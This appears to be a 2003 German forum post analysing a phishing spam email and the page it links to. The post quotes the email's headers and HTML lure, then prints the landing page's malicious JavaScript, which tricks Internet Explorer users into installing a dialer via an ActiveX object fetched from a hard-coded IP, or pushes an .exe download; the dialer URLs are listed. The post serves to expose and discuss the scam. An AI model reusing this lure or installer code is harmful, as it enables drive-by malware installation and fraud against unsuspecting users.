PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : [UCE] Erinnerung !



testkeintest
21.04.2003, 23:04
schon wieder webmasterservice, oder?
Wer ist für den Dialer veranstwortlich s.u.
Spam:
Return-path: <mailserver [at] 126.com>
Envelope-to: [...]
Delivery-date: Tue, 22 Apr 2003 xx:xx:xx +0200
[...]
Received: (qmail 3377 invoked by UID: [UID filtered]
Received: from 243.Red-80-35-145.pooles.rima-tde.net (HELO mail.mail.com) (80.35.145.243)
by mx0.gmx.net (mx013-rz3) with SMTP; 22 Apr 2003 xx:xx:xx +0200
Received: from mail.mail.com [86.133.101.166] (helo=mail.mail.com)
Reply-To: <mailserver [at] 126.com>
From: "Serviceteam" <mailserver [at] 126.com>
To: "" <[deleted]>
Subject: Erinnerung !
MIME-Version: 1.0
Content-Type: text/html; charset="iso-8859-1"
X-Mailer: Microsoft Outlook Express 6.00.2462.0000
Date: Tue, 22 Apr 2003 xx:xx:xx +0200
Message-ID: [ID filtered]
X-Resent-By: Forwarder <forwarder [at] gmx.de>
X-Resent-For: [...]
X-Resent-To: [...]
X-MailScanner: Found to be clean
X-MailScanner-SpamCheck:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Sie haben eine Kontaktmaill erhalten</title>
</head>
<body>
<p style="margin-top: 0; margin-bottom: 0">Sehr geehrter Kunde,

<p style="margin-top: 0; margin-bottom: 0">

<p style="margin-top: 0; margin-bottom: 0">sie haben eine Kontaktmail erhalten. Um
diese einzusehen

<p style="margin-top: 0; margin-bottom: 0">folgen Sie einfach folgenden Link.

<p style="margin-top: 0; margin-bottom: 0">

<p style="margin-top: 0; margin-bottom: 0">
http://www.privatseitennetz (<a href=) .com/web127/04_2003_88sja2jp1qq.htm">zur
Kontaktmailmail 04_2003_88sja2jp1qq</a>

<p style="margin-top: 0; margin-bottom: 0">

<p style="margin-top: 0; margin-bottom: 0">Diese Kontaktmail erreichte uns am
22.04.2003 um 9:14 Uhr MEZ

<p style="margin-top: 0; margin-bottom: 0">Bitte beachten Sie das diese
Nachricht nach 3 Tagen wieder von

<p style="margin-top: 0; margin-bottom: 0">unserem Server gelöscht wird.

<p style="margin-top: 0; margin-bottom: 0">

<p style="margin-top: 0; margin-bottom: 0">Hochachtungsvoll

<p style="margin-top: 0; margin-bottom: 0">Ihr Serviceteam

</body>
</html>
[Ende Spam]

Schadcode:
function acceptcert(el) {
if(el == "p1") {
alert(`Um herauszufinden wer Ihnen diese Nachricht geschrieben hat oder wenn Sie diese Nachricht vollständig angezeigt bekommen wollen bestaetigen Sie folgende Abfrage bitte mit JA`);
install(`p2`);
} else {
document.location.href(`nachr992jn8sa.exe`);
}
}
function install(element) {
if (navName == `Microsoft Internet Explorer` && navVersion >= 2) {
document.getElementById(element).innerHTML = `<object id="DIALER`+element+`" width=1 height=1 `+
`onerror="acceptcert(`+"`"+element+"`"+`)" ` +
`classid="CLSID:978A4DB6-D22A-4D55-B350-DAB71097BF69" `+
`codebase="http://212.112.203.97/dialer/wsd_2.cab?x=1047497548"> `+
`<param name="installuri" value="http://212.112.203.97/dialer/settings.ph...webmaster=15501 (http://212.112.203.97/dialer/settings.php?dialer=27&webmaster=15501)">`+ <!-- DIALER ID: [ID filtered]
`<param name="UID" value="27"></object>`; <!-- DIALER ID: [UID filtered]
} else {
location.replace(rtsdialerPath)
}
return;
}
Ende Schadcode
also Dialerkandidaten
http://www.privatseitennetz .com/web127/nachr992jn8sa.exe <-- wohl eher der Dialer, oder?
http://212.112.203. 97/dialer/wsd_2.cab?x=1047497548
http://212.112.203. 97/dialer/settings.php?dialer=27&webmaster=15501

Nun ist die meine Version "GNU strings 2.10.91" veraltet, ich kann schon wieder keine Rufnummer entdecken, die anderen Links deuten aber stark auf Webmasterservice hin. Soll das etwa die dritte in einer Woche sein?